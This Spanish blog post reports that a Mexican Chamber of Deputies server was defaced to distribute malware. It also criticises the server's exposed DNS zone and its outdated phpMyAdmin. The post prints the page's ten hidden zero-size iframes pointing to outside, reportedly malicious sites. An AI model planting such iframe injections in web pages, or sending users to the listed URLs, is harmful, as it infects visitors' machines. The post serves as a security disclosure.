Servidor de la Cámara de diputados distribuye Malware

No, no es esa otra noticia, donde un niño de 14 años les cambio la portada a la pagina de la cámara de  diputados. Ni tampoco esa noticia donde guardaban porno y lo ponían disponible a quien lo quisiera bajar. Ni tampoco esa otra donde exponían el archivo shadow (de usuarios y contraseñas de unix) directo para quien lo quiera ver en la cámara de diputados.

Esta es otra historia diferente.

Después  leer la noticia del chamaco de 14 años, y de 5 minutos de investigación, encontré que la cámara de diputados tiene un servidor publico en el que muy alegremente distribuyen Malware.

Para los que lo quieran ver, y mientras dure, el servidor es este:

http://pac.diputados.gob.mx

Advertencia: Les recomiendo que visiten la pagina con firefox, noscript y antivirus instalado. O con Linux :). De lo contrario podrían convertirse en zombies y un cachorro morirá. (La parte de los zombies es cierta :P)

La pagina tiene el siguiente código:

   1: <iframe src="http://www.bsupport.clara.net/cgi/" frameborder="0" width="0" height="0"></iframe>
   2: <iframe src="http://oscentolos.com/cgi/" frameborder="0" width="0" height="0"></iframe>
   3: <iframe src="http://thatsentertainmentinoz.com.au/log/" frameborder="0" width="0" height="0"></iframe>
   4: <iframe src="http://www.kawaart.com/cgi/" frameborder="0" width="0" height="0"></iframe>
   5: <iframe src="http://www.lindomar.com.br/cgi/index.html" frameborder="0" width="0" height="0"></iframe>
   6: <iframe src="http://www.youtube.com/watch?v=jTah9ckvV3Y" frameborder="0" width="0" height="0"></iframe>
   7: <iframe src="http://mavideniz1.org/forum/" frameborder="0" width="0" height="0"></iframe>
   8: <iframe src="http://siyamiozkan.com.tr/forum" frameborder="0" width="0" height="0"></iframe>
   9: <iframe src="http://mavi1.org/" frameborder="0" width="0" height="0"></iframe>
  10: <iframe src="http://mavideniz1.org/" frameborder="0" width="0" height="0"></iframe>

Algunos de esos sitios distribuyen malware.

Llama la atención que también hacen links a un vídeo de youtube. Al mostrar el vídeo queda claro quien fue el  responsable del deface. Al parecer el responsable fue iskorpitx un hacker turco que se hizo famoso tras un  incidente con miles de servidores.

Lo preocupante del asunto es que una vez que se tiene acceso a un servidor, se puede crear una reacción en cadena y tener acceso a los demás servidores de la red de la cámara de diputados. Y dada la laxa seguridad y control que tienen sobre su red, no dudaría que varios de estos servidores sean controlados por gente ajena a la administración.

Y tal vez este deface sea el menor de sus problemas, cuando su servidor DNS esta exponiendo toda la zona a quien quiera verla.  Es decir, con un simple comando en la consola tu puedes obtener la lista de todos sus servidores públicos.

Y ya ni hablar de que tienen una versión vieja (y vulnerable) de su software de acceso a su base de datos, visible para todo el publico (debo aceptar que cuando vi esto, mi palma dio una rapida visita a mi frente).

Pantallazo-phpMyAdmin 2.10.1 - Minefield

Es lamentable y preocupante como se lleva la política de administración de estos servidores. Mas preocupante aun cuando el responsable de esto asegura que su seguridad es “estable” y que el problema no existe.

Cuando se es incapaz de ver el problema, es imposible arreglarlo. Casos como estos se seguirán repitiendo. Todo, pagado por nuestros impuestos.

Leave a Reply

Your email address will not be published. Required fields are marked *